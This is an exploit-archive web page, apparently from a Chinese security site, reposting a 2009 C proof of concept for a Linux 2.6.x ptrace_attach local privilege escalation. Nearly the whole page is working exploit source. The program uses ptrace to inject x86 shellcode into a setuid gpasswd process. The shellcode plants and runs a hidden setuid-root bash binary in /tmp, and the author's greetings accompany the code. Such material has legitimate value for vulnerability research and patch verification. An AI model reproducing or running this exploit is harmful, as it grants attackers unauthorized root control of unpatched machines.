首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit 来源：s0m3b0dy1 (at) gmail.com 作者：s0m3b0dy 发布时间：2009-05-14   /* ptrace_attach privilege escalation exploit by s0m3b0dy [*] tested on Gentoo 2.6.29rc1 grataz: Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo... email: s0m3b0dy1 (at) gmail.com */ #include <grp.h> #include <stdio.h> #include <fcntl.h> #include <errno.h> #include <paths.h> #include <string.h> #include <stdlib.h> #include <signal.h> #include <unistd.h> #include <sys/wait.h> #include <sys/stat.h> #include <sys/param.h> #include <sys/types.h> #include <sys/ptrace.h> #include <sys/socket.h> char shellcode[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99" "\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" "\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff" "echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;"; struct user_regs_struct322 {         unsigned long ebx, ecx, edx, esi, edi, ebp, eax;         unsigned short ds, __ds, es, __es;         unsigned short fs, __fs, gs, __gs;         unsigned long orig_eax, eip;         unsigned short cs, __cs;         unsigned long eflags, esp;         unsigned short ss, __ss; }; main() { struct user_regs_struct322  regs; struct stat buf; int i,o; unsigned long * src; unsigned long * dst; char *env[2]; env[0]="/usr/bin/gpasswd";  // some suid file env[1]=0; if((o=fork()) == 0) { execve(env[0],env,0); exit(0); } if(ptrace(PTRACE_ATTACH,o,0,0)==-1) { printf("\n[-] Attach\n"); exit(0); } wait((int *)0); if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){                 printf("\n[-] read registers\n"); exit(0); } printf( "[+] EIP - 0x%08lx\n", regs.eip); dst= (unsigned long *) regs.eip; src = (unsigned long *) shellcode; for(i=0;i<sizeof(shellcode) -1;i+=4) if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){                        printf("\n[-] write shellcode\n"); exit(0); } ptrace(PTRACE_CONT, o, 0, 0); ptrace(PTRACE_DETACH,o,0,0); printf("[+] Waiting for root...\n"); sleep(2); if(!stat("/tmp/.exp",&buf)) { printf("[+] Executing suid shell /tmp/.exp...\n"); execv("/tmp/.exp",0); } else { printf("[-] Damn no r00t here :(\n"); } return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·MaxCMS 2.0 (m_username) Arbitr ·DigiMode Maya 1.0.2 (.m3u / .m ·Family Connections CMS <= 1.9 ·Linux Kernel 2.6.29 ptrace_att ·Pinnacle Studio 12 (.hfz) Dire ·StrawBerry 1.1.1 LFI / Remote ·ipsec-tools racoon frag-isakmp ·2daybiz Business Community Scr ·Java SE Runtime Environment - ·2daybiz Template Monster Clone ·(POST var 'rating') BLIND SQL ·linux/x86-64 setuid(0) + execv   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved